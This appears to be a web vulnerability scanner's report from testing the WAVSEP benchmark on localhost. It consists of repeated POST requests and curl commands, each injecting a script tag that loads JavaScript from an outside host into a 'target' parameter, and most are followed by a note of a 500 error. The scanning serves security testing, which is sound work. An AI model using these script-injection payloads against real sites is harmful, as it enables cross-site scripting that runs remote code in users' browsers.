POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwfwkiul2ybz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwfwkiul2ybz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw74b7bj4s3z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw74b7bj4s3z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwpxk80k8x5z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwpxk80k8x5z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw83lie52mkz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case40-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw83lie52mkz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwq3797i7dmz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case41-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwq3797i7dmz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwqx2d65zsz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwqx2d65zsz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwj5ft2ov2lz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwj5ft2ov2lz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwy8hef8h2ez.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case44-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwy8hef8h2ez.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwb3xxt7gw3z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case53-LFI-FileClass-FilenameContext-SlashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwb3xxt7gw3z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwddqjk5y9dz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwddqjk5y9dz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwv5wtwvxk8z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case57-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwv5wtwvxk8z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwbvatpx292z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwbvatpx292z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwt67r8acwoz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwt67r8acwoz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwk2ciy5c81z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwk2ciy5c81z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwo6pj8oyl4z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwo6pj8oyl4z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwpjzbq0a2bz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwpjzbq0a2bz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwl747bvjsz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwwl747bvjsz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwceggehjohz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwceggehjohz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwta5ucsue9z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwta5ucsue9z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwppjzi2jiiz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwppjzi2jiiz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw7lj3p1n5lz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw7lj3p1n5lz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw63vhjjbd0z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw63vhjjbd0z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwy6hcw799kz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp" -e "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp" -d "target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwy6hcw799kz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
POST /wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-POST-500Error/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp Content-Type: application/x-www-form-urlencoded target=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw4rx48pj1zz.js%3E%3C%2Fscript%3E
